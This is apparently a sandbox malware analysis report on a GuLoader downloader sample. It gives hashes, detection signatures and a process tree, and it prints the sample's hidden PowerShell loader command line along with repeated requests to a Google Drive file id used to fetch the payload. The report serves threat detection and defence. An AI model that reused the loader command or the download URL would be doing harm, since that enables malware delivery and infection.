Edit tour

Windows Analysis Report
AwMu7gR48D.exe

Overview

General Information

Sample name:	AwMu7gR48D.exe renamed because original name is a hash value
Original sample name:	6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287.exe
Analysis ID:	1567521
MD5:	e910dd39a106dfb09f31945608899357
SHA1:	3c769e1093522daf75c7425413a5d44dd3f29f7f
SHA256:	6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

AwMu7gR48D.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\AwMu7gR48D.exe" MD5: E910DD39A106DFB09F31945608899357)

powershell.exe (PID: 6076 cmdline: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 4516 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 172.217.19.174, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4516, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6076, TargetFilename: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", CommandLine: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AwMu7gR48D.exe", ParentImage: C:\Users\user\Desktop\AwMu7gR48D.exe, ParentProcessId: 1992, ParentProcessName: AwMu7gR48D.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", ProcessId: 6076, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T16:43:50.010223+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49709	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: AwMu7gR48D.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

Avira: detection malicious, Label: TR/Injector.qhjhe

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: AwMu7gR48D.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: AwMu7gR48D.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49738 version: TLS 1.2

Source: AwMu7gR48D.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 172.217.19.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
